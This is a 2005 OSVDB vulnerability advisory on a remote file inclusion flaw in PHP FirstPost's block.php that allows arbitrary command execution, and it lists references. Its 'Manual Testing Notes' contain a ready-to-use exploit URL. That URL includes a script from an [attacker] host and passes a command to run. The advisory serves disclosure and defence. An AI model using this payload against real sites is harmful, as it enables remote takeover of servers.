PHP FirstPost block.php Include Variable Remote File Inclusion

2005-07-24T04:35:50
ID OSVDB:18394
Type osvdb
Reporter ][GB][(gb.network@gmail.com)
Modified 2005-07-24T04:35:50

Description

Vulnerability Description

PHP FirstPost contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to block.php not properly sanitizing user input supplied to the Include variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

PHP FirstPost contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to block.php not properly sanitizing user input supplied to the Include variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/path_to_script/block.php?Include=http://[attacker]/cmd.gif?&cmd=|command|

References:

Vendor URL: http://phpfirstpost.sourceforge.net/ Security Tracker: 1014563 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-07/0409.html Mail List Post: http://attrition.org/pipermail/vim/2007-May/001616.html Generic Exploit URL: http://milw0rm.com/exploits/3906 CVE-2005-2412 Bugtraq ID: 23947